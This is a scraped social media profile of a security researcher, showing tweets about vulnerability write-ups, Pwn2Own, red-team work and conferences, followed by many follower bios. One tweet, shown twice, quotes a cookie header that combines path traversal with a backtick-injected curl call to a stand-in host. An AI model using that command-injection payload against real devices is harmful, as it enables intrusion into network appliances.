Rio @0x09AL
POC || GTFO Adversary Simulation - @IBM Founder & Organiser - @BSidesTirana github.com/0x09AL https://blog.pwn.al Joined March 2015-
Tweets4K
-
Followers6K
-
Following1K
-
Likes10K
New post on the blog… Exploiting CVE-2024-21111 : Local Privilege Escalation in Oracle VirtualBox by @filip_dragovic mdsec.co.uk/2024/04/cve-20…
Excited to join the @BlackHatEvents USA Review Board for the exploit development, enterprise, & cloud tracks!
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/ohno`curl${IFS}evil-com`; Read the blogpost though as it's pretty interesting and not a simple stupid directory traversal bug.
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/ohno`curl${IFS}evil-com`; Read the blogpost though as it's pretty interesting and not a simple stupid directory traversal bug.
You know you need a break when you almost sign e-mails with your name rather than your sock puppet name.
"Hobbyists" with this level of skills have fulfilling careers unless they have poor impulse control - and then, well, you know, you end up defacing websites for the lolz.
And more seriously: nobody who isn't paid to do this for a living has the patience and restraint for a two-year long con to get a well-engineered backdoor into a compression library.
@chompie1337 becomes the first solo female competitor to score a full win at #Pwn2Own!!!
@chompie1337 becomes the first solo female competitor to score a full win at #Pwn2Own!!!
Congratulations to Chompie who scored a win in the Windows 11 LPE category! Her exploit circumvents the latest Virtualization Based Security mitigations. She becomes the first solo female competitor to score a full win at #Pwn2Own, the world’s most prestigious hacking competition
Congratulations to Chompie who scored a win in the Windows 11 LPE category! Her exploit circumvents the latest Virtualization Based Security mitigations. She becomes the first solo female competitor to score a full win at #Pwn2Own, the world’s most prestigious hacking competition
New blog post is up... Identity Providers for RedTeamers. This follows my #SOCON2024 talk, and provides the technicals behind the presentation, looking at other IdP's and what techniques are effective beyond Okta. blog.xpnsec.com/identity-provi…
w00t w00t - having taken the training before, I highly recommend it 🙏
So apparently MSRC now thinks this is a valid issue 🤔 Lmao
So apparently MSRC now thinks this is a valid issue 🤔 Lmao https://t.co/VNh04O8kGo
I'm pumped to announce the release of Misconfiguration Manager, a knowledge base and how-to for both offensive and defensive SCCM attack path management, that @subat0mik, @garrfoster, and I have been working on! Check it out and let us know what you think! posts.specterops.io/misconfigurati…
[Blog] CVE-2024-21378 – Microsoft Outlook Remote Code Execution How we discovered & were able to exploit this vulnerability: ow.ly/L29F50QQ7s4 Written by: Rich Wolferd, NetSPI’s Director of Red Team Operations & Nick Landers @monoxgas
This past week I was excited to represent Adversary Services (@XForce) at the launch of the new IBM Cyber Range in DC. I did a panel on security and AI, I strongly believe AI is dramatically going to change our industry in a few short years. More details: linkedin.com/feed/update/ur…
Come hack with us! I am hiring for operators for our Managed Red Teaming practice. This role delivers "continuous" monthly red team services for clients to a "Targeted" sophistication level, helping them mature their security program on a more frequent basis then our ad-hoc, more…
Full Disclosure time: Here's a quick LPE for macOS that affects you if you have Homebrew installed under /usr/local (Intel macs or Apple Silicon with Game Porting Toolkit) github.com/gergelykalman/… You have to wait for periodic.daily to run, but that's a small price to pay
What happens when you give a Cisco IP phone to our Red Team? They figure out how to trigger a command injection vulnerability (CVE-2023-20087). securityintelligence.com/x-force/cve-20…
We can relay back to the same machine using Kerberos relay instead of NTLM relay. I discovered this attack vector more than a year ago. I will describe it in detail in upcoming Black Hat Asia 2024 blackhat.com/asia-24/briefi… and introduce more interesting attacks.
We can relay back to the same machine using Kerberos relay instead of NTLM relay. I discovered this attack vector more than a year ago. I will describe it in detail in upcoming Black Hat Asia 2024 blackhat.com/asia-24/briefi… and introduce more interesting attacks. https://t.co/T54yHWXFSt
Justin Elze @HackingLZ
52K Followers 5K Following Hacker/CTO @TrustedSec | Former Optiv/SecureWorks/Accuvant Labs/Redspin | Race carsDave Kennedy @HackingDave
207K Followers 6K Following Founder @Binary_Defense @TrustedSec Co-Owner https://t.co/HQC75WhdJh. @WeHackHealth Podcast. Fam First/Hacker/CSO/USMC/Intel/Fitness. Motto: Make world a better placeGrzegorz Tworek @0gtweet
30K Followers 1K Following My own research, unless stated otherwise. Not necessarily "safe when taken as directed". GIT d- s+: a+ C++++ !U !L !M w++++$ b++++ G-mRr3b00t @UK_Daniel_Card
92K Followers 7K Following 真理的揭露者 Quis custodiet ipsos custodes fella in cyberspace #nafo undercover #FVEY Lovely Horse #fella #meme #farm #appreciator #cyber #specialistJosh @passthehashbrwn
7K Followers 344 Following Adversarial Simulation at IBM, tweets are mine etc.Rad @rad9800
6K Followers 830 Following labs @praetorianlabs opinions are my own and not of my employermgeeky | Mariusz Bana.. @mariuszbit
11K Followers 611 Following 🔴 Red Team operator, ex-MWR/F-Secure pentester, ex-AV engine developer @ESET, green tea addict. 🫖 @[email protected]b33f | 🇺🇦✊ @FuzzySec
32K Followers 844 Following 意志 / Antiquarian @ IBM Adversary Services / Ex-TORE ⚔️🦅 / I rewrite pointers and read memory / AI Psychoanalyst / Teaching @CalypsoLabsDebugPrivilege @DebugPrivilege
37K Followers 2K Following Security “Researcher” | Former Microsoft MVP | All Tweets are my opinions and thoughts. Interested in Security, Debugging, and Troubleshooting.Dominic Chell 👻 @domchell
16K Followers 531 Following Just your friendly neighbourhood red teamer @MDSecLabs | Creator of /r/redteamsec | https://t.co/3k3EBAZqGd | https://t.co/KwO2OwDOklx86matthew @x86matthew
17K Followers 344 Following C / asm / reverse engineering. Developer at @MDSecLabs. Other stuff at @the_secret_clubJean @Jean_Maes_1994
11K Followers 1K Following Director of Advanced Assessments -EU @neuvik | @sansoffensive Certified instructor/SEC565 author/SEC699 co author https://t.co/haRI3ruvlgklez @KlezVirus
6K Followers 668 Following Principal Cyber Security Consultant at Digital Trust Consulting Services, BSI - Opinions are my ownWill Dormann @wdormann
26K Followers 1K Following I play with vulnerabilities and exploits. @[email protected]Marcello @byt3bl33d3r
29K Followers 531 Following CyBeRsEcUrItY | Not afraid to put down with some THICC malware on disk | securing and breaking AI @ProtectAICorp | Ex @spacexFilip Dragovic @filip_dragovic
6K Followers 1K Followingsn🥶vvcr💥sh @snovvcrash
10K Followers 439 Following Sr. Penetration Tester / Red Team Operator @ptswarm :: Author of Pentester’s Promiscuous Notebook (https://t.co/rL1sv5A2R7) :: He/him :: Tweets’re my pwn 🐣ً @GujaMmark
17 Followers 547 Followingsink0Rswim @laceandload
106 Followers 2K FollowingChriss_0x01 @Chriss_0x01
900 Followers 4K Following Proud #EthicalHacker #CyberCrime🖥️#Investigator #BugBounty🏆#Hunter #ThreatHunter (#InfoSec & #CyberSec) #Expert🧑💼 && _I_AM_: CEO @EthiclSecAgency 👀Seclore @secloretech
1K Followers 2K Following Seclore’s mission is to protect sensitive data, giving organizations complete control over critical information with innovative solutions.Advik @Ad_vi_k
50 Followers 2K FollowingRyuku🔻 @its_ryuku
83 Followers 415 FollowingThibault Paris @thp4ris
63 Followers 546 Following All tweets and opinions are my own | security geekMohammad Kaif @_mkahmad
811 Followers 1K Following 20 yo | Top 1 Security Researcher in OPPO, OnePlus & Tecno Mobile Bug Bounty Programs (in 2020-21 , 2021 & 2021 respectively) | h1: kaif0x01 other: mkahmadVinay @V9Y_1nf0sec
3 Followers 258 Followingskrappy0x4a @skrappy0x4a
237 Followers 1K Following Head of SecOps | War Vet | Not Popular/Cool | Learning Russian 1 incident at a time | 🏍🦑 | BJJ ◧◧◧errør404 @hugopicanzo
3K Followers 3K Following Offensive Security - "Practice harder, work harder. Don’t ever make excuses for yourself."CyberOPS MX @CyberopsM92115
8 Followers 688 FollowingGolgothus (Zach He/Hi.. @Golgothus
1K Followers 665 Following Senior Incident Response Engineer | Threat Hunting, IR, Cloud | ENFJ | https://t.co/78ZPXqXGxN Your friendly CSO! (Chief Soap Officer)BiGBells 🎈 @Traxx4G
233 Followers 655 FollowingAnachronist @Anachronis43313
27 Followers 588 FollowingMarc André Tanner @marcandretanner
67 Followers 420 Following Information Security, Systems Programming, Text Editors, ...Carlos Mayorga @MayorgTech
287 Followers 2K Following System Administrator | Working on transitioning to Cybesecuritytaintang @taintang1
4 Followers 9 FollowingAsd @npodesta1
182 Followers 2K FollowingHakajshs @Hakajshs1
31 Followers 265 FollowingChoboSyk @ChoboSyk
19 Followers 141 Followinggzobqq @chrome0day
0 Followers 177 FollowingFelix @felixfromessen
1 Followers 4K FollowingAli @syncwithali
61 Followers 172 FollowingSteelCon @Steel_Con
7K Followers 3K Following SteelCon is a family friendly hacker conference in Sheffield. Next event is July 19-21 2024. @hacknotcrime AdvocateBrandon Fisher @Shad0wCntr0ller
197 Followers 221 Following Security Analyst @ Rapid7 Likes/comments/posts from this account does not represent my employers views.Jev 🇵🇸 @h33tjubaer
601 Followers 258 Following Senior Security Consultant @ Bitdefender/Horangi | Security Automation | H1 Former Hunter |The Cyber Ghost @The_cyberghost
82 Followers 1K Following Aligning my curiosity one hack at a time ..Herman LEI @HermanLEI_
25 Followers 107 FollowingJazz Singh Gill @Jazz_Singh_Gill
903 Followers 3K Following Native Memphian, TN. Gen Z. ADHD. Neutral Evil. Eagle Scout. @pdsmemphis '06 @musowls '12 @RhodesCollege BA'16,MS'17 @GeorgetownMSF '21. Fortune40alum. 💯club💯Khaled Esheh @KhaledEsheh
58 Followers 2K FollowingLalaBlumberg @BlumbergLa46588
120 Followers 2K FollowingTed Foxx @TedFoxx238985
178 Followers 3K Following #cancersucks Constantly searching for help for cancer patients.王征宇 @xi4o0
6 Followers 718 FollowingBobby Kuzma @BobbyKuzma
404 Followers 1K Following I break things and take pictures of rockets. Offensive security leader. Opinions my own.Justin Elze @HackingLZ
52K Followers 5K Following Hacker/CTO @TrustedSec | Former Optiv/SecureWorks/Accuvant Labs/Redspin | Race carsFlorian Hansemann @CyberWarship
75K Followers 47 Following Father, Founder @HanseSecure, Pentesting, Student, ExploitDev, Redteaming, InfoSec & CyberCyber; -- Mastodon: https://t.co/KFSKYUN98MMike Felch (Stay Read.. @ustayready
15K Followers 2K Following Pentester / Red Team | Hacking since Renegade BBS backdoors | Dev since vb3 | Content since '99-'03 ezines | Prior CrowdStrike / BHIS | In Christ's gripNicolas Krassas @Dinosn
122K Followers 735 Following Head of Threat & Vulnerability Mgmt @ Henkel AG & Co. KGaA https://t.co/NC1orlKrW3Dave Kennedy @HackingDave
207K Followers 6K Following Founder @Binary_Defense @TrustedSec Co-Owner https://t.co/HQC75WhdJh. @WeHackHealth Podcast. Fam First/Hacker/CSO/USMC/Intel/Fitness. Motto: Make world a better placeGrzegorz Tworek @0gtweet
30K Followers 1K Following My own research, unless stated otherwise. Not necessarily "safe when taken as directed". GIT d- s+: a+ C++++ !U !L !M w++++$ b++++ G-mRr3b00t @UK_Daniel_Card
92K Followers 7K Following 真理的揭露者 Quis custodiet ipsos custodes fella in cyberspace #nafo undercover #FVEY Lovely Horse #fella #meme #farm #appreciator #cyber #specialistJosh @passthehashbrwn
7K Followers 344 Following Adversarial Simulation at IBM, tweets are mine etc.ippsec @ippsec
111K Followers 350 FollowingRad @rad9800
6K Followers 830 Following labs @praetorianlabs opinions are my own and not of my employermgeeky | Mariusz Bana.. @mariuszbit
11K Followers 611 Following 🔴 Red Team operator, ex-MWR/F-Secure pentester, ex-AV engine developer @ESET, green tea addict. 🫖 @[email protected]b33f | 🇺🇦✊ @FuzzySec
32K Followers 844 Following 意志 / Antiquarian @ IBM Adversary Services / Ex-TORE ⚔️🦅 / I rewrite pointers and read memory / AI Psychoanalyst / Teaching @CalypsoLabsSam Curry @samwcyo
77K Followers 949 Following Hacker, bug bounty hunter. Run a blog to better explain web application security.DebugPrivilege @DebugPrivilege
37K Followers 2K Following Security “Researcher” | Former Microsoft MVP | All Tweets are my opinions and thoughts. Interested in Security, Debugging, and Troubleshooting.Dominic Chell 👻 @domchell
16K Followers 531 Following Just your friendly neighbourhood red teamer @MDSecLabs | Creator of /r/redteamsec | https://t.co/3k3EBAZqGd | https://t.co/KwO2OwDOklBrian in Pittsburgh @arekfurt
6K Followers 774 Following Former attorney, current IT & infosec consultant in the 'Burgh. Happy to talk about password spraying one minute and constitutional law the next. Son of #wvu.CYBERUK @CYBERUKevents
18K Followers 98 Following The government's flagship cyber security event from @NCSC. Bringing together cyber security leaders and professionals from the public and private sector.NetSPI @NetSPI
3K Followers 549 Following The global leader in proactive security. Trusted by 9 out of 10 top US banks. #PenetrationTesting #CyberSecurity #InfoSecMaor Shwartz @malltos92
3K Followers 4K Following Help researchers, offensive cybersecurity companies and governments navigate the offensive cybersecurity industryManfred Paul @_manfp
5K Followers 279 Following Maths and cyber and stuff. Playing CTFs with @redrocket_ctf (and @Sauercl0ud). Pwn2Own Vancouver 2020..=2022, 2024. @[email protected]Calypso Heavy Industr.. @CalypsoLabs
170 Followers 1 Following Labs & Design \ Providing High Quality Technical Training Solutions \ Shadows Dance on the ShoreIsmael Valenzuela @aboutsecurity
17K Followers 9K Following VP Threat Research & Intelligence @BlackBerry ▪️ Ex @Foundstone @Intel @McAfee ▪️ SANS Senior Instructor, GSE #132 ▪️ Author #SEC530 #SEC568 #ThinkRedActBlueWael Masri @waelmas01
328 Followers 138 Following Multidisciplinary Tech Leader | NASA Space Apps Winner | Web Summit Finals | TEDx | BSidesQuentin Kaiser @qkaiser
1K Followers 730 Following Offensive security / vulnerability finder. security researcher @onekey_sec / @konkretesec founder / @ecoswtf initiatorDark Web Intelligence @DailyDarkWeb
92K Followers 0 Following https://t.co/3gj0T4Udv3 | Your daily dose from the dark side ☠️ For any questions about a post, you can send an email to [email protected]Tailscale @Tailscale
22K Followers 177 Following Simple, secure networks for teams of any scale. Built on WireGuard.ClearSky Cyber Securi.. @ClearskySec
8K Followers 460 Following Cyber security and threat intelligence company🆆 🅷 🅸 🅳 -.. @whid_ninja
8K Followers 2 Following Spreading Hardware Security Awareness and R&Ding IoOT ™ (Internet of Offensive Things) since 2017 {From 🇮🇹 with ❤️} - 🌐https://t.co/4txem9Ak30Justin Bui @slyd0g
4K Followers 353 Following I break computers and skateboards | red/blue/whatever let's make security better | Offensive Security @SnowflakeDB | Prev @Zoom @SpecterOpsInfosec Battle Bots @InfosecBots
598 Followers 413 Following Infosec's very own battle bot league, currently running in UK, NI and select EU events. For sponsorship or booking contact @pyroguy_uk @brains933The Best @ThebestFigen
985K Followers 1 Following Teacher / Posting cool old viral content... and cool page @xxxxTheKing - No to circuses and zoo.....human being is not the lord of animals!Hors @horsicq
4K Followers 968 Following Binary researcher. Assembler/C++. Author of many RE tools: https://t.co/DYTw9z5RSfchristine is throwing.. @x71n3
1K Followers 817 Following 'Don't miss opportunities because you think that ideas aren't important unless they're complicated. Simple ideas are often the most powerful.' -Patrick WinstonFox_threatintel @banthisguy9349
7K Followers 157 Following Just a person who is against cyber crime.Pika @pika_labs
116K Followers 53 Following Video on command. Website: https://t.co/G5bjmrMQsx Discord: https://t.co/bX68ThPTQH About: https://t.co/atvdcgbe9Scody @ewbysec
354 Followers 622 Following red team in big finance | adversary em/sim and offensive devmr.d0x @mrd0x
40K Followers 246 Following Security researcher | Co-founder https://t.co/QxBlzpa7Y4 | https://t.co/zqMXQRZRGl | https://t.co/Fq7WSqU9kI | https://t.co/eKezFcOEcLtalson @Ripp3rdoc
2K Followers 469 Following An apprentice of the dark arts | Vuln Research w/ EMU TEAMOpenSecurityTraining2 @OpenSecTraining
8K Followers 15 Following 501(c)3 Nonprofit providing Open Source and Open Access computer security training material. #OST2 re-launched July 2021! [email protected]Sharmine Narwani @snarwani
122K Followers 979 Following Columnist @TheCradleMedia; West Asian geopolitics; Frmr Senior Associate, St Antony's College, Oxford Univ. @ColumbiaJourn Archive: https://t.co/kY89b9vJZAMax Grim @max__grim
382 Followers 270 Following Red Teamer @OutflankNL | Cyber Security | Messing around with hardwareHayden Clarkin @the_transit_guy
119K Followers 5K Following Sometimes known as The Transit Guy. I love transit, Adele, ABBA. @transitcon My Tweets are Me.Tijme Gommers @tijme
2K Followers 554 Following Red Teamer at @NorthwaveLabs 🐙. Digital Forensics at @HuntedNL. Cyber Cyber Cyber ⚡. Mastodon: https://t.co/ZSK8EoiOWB. Bluesky: @tijme (https://t.co/fbHUNra5Dq)Charlie Clark @exploitph
5K Followers 1K FollowingCoinfessions @coinfessions
192K Followers 1 Following anonymous crypto confessions by @illustratealpha THERE IS NO COIN. THERE IS NO DISCORD. Supported by @rollbitcomMatt Johansen @mattjay
28K Followers 2K Following Helping Secure the Internet | Long Island elder emo surviving in ATX | Expect: infosec current events, DFIR, appsec & cloudsec - and me!Ollie Whitehouse @ollieatnowhere
5K Followers 1K Following CTO @NCSC Former: PortSwigger, Interrupt Labs, NCC Group, BlackBerry, Symantec and AtstakeArmend Gashi 🇽🇰 @armendxgashi
79 Followers 259 FollowingDaniel Moghimi @flowyroll
3K Followers 356 Following Senior Scientist @Google. Computer and Hardware Security. Tweets are mine and not my employer's. #downfall Previously: @UCSD @Qualcomm @WPI @TalosSecurityGreat streams coming up on the Off By One Security Channel from @FuzzySec, @haxorthematrix, @yarden_shafir, @AlanSguigna, @jstrosch, and more coming soon!! Please let me know what additional topics you'd like to see? Join our Discord Server here: discord.gg/offbyonesecuri…
I'm still pretty open on topic suggestions, I have been a terrible guest so far leaving @Steph3nSims hanging. If you have any suggestions on what you would like me to talk about (frida, research methodology, C2, something Windows) drop a comment! I will announce that as part of…
Great streams coming up on the Off By One Security Channel from @FuzzySec, @haxorthematrix, @yarden_shafir, @AlanSguigna, @jstrosch, and more coming soon!! Please let me know what additional topics you'd like to see? Join our Discord Server here: discord.gg/offbyonesecuri…
Remote exploitation of a man-in-the-disk vulnerability in WhatsApp (CVE-2021-24027) census-labs.com/news/2021/04/1…
My new favourite technical drawing tool is Excalidraw.. Just the right amount of unprofessionalism to keep the inner anarchist alive.
This is gonna be fun! See you there :)
🎉 Exciting news! 🎉 The agenda for #x33fcon has just been announced! 📢 Don't miss out on insightful #talks, engaging #workshops, and #networking opportunities. Who's presenting this year? Check it out: x33fcon.com/#!conference.md #cybersecurity #conference #workshops #training
Source of all goodies here github.com/icesfont/DOMPu… So nesting a lot of tags is bad... oh goodie?
DOMPurify 3.1.1 & 2.5.1 have been released. Both are security releases & should be upgraded to asap. Note: More releases might follow, the mitigated attack is novel. Eternal gratitude goes to @IcesFont for finding, reporting & helping with fixes 🙇 github.com/cure53/DOMPuri…
I had a great time at SAFACon meeting old and new friends, making merry and talking about hacking all the things 🙇♂️ You can find my slides linked below: github.com/FuzzySecurity/…
@0x09AL Shouldn’t surprise you, we’re an entire industry propped up by POCs, run at your own risk and for educational purposes only software. 🤣
Apple’s on-device LLMs are out. And we get to play with them. I am so excited to jump into this and see just how well they perform and what we can expect from iOS devices to come. huggingface.co/apple/OpenELM
New post on the blog… Exploiting CVE-2024-21111 : Local Privilege Escalation in Oracle VirtualBox by @filip_dragovic mdsec.co.uk/2024/04/cve-20…
Short blog post for EoP in virtualbox
New post on the blog… Exploiting CVE-2024-21111 : Local Privilege Escalation in Oracle VirtualBox by @filip_dragovic mdsec.co.uk/2024/04/cve-20…
@cerbersec @au5_mate I’m always happy to hear about issues you’re running into! I’m open to any and all feedback :)
itm4n.github.io/printnightmare… It is still a nightmare
The Talos and @NCSC write-ups on arcane door are very good and worth a read, the troubling bit is the lack of details around the initial execution vector... Not sure enough noise is being made about this... ncsc.gov.uk/static-assets/… blog.talosintelligence.com/arcanedoor-new…
Excited to join the @BlackHatEvents USA Review Board for the exploit development, enterprise, & cloud tracks!
We are approaching 300,000 followers on Twitter. This is an astronomically large number that we never expected to reach. Some thoughts and feelings: When vx-underground was first created in May, 2019 the initial goal was to 'revive the VX-scene' – with the hopes that with…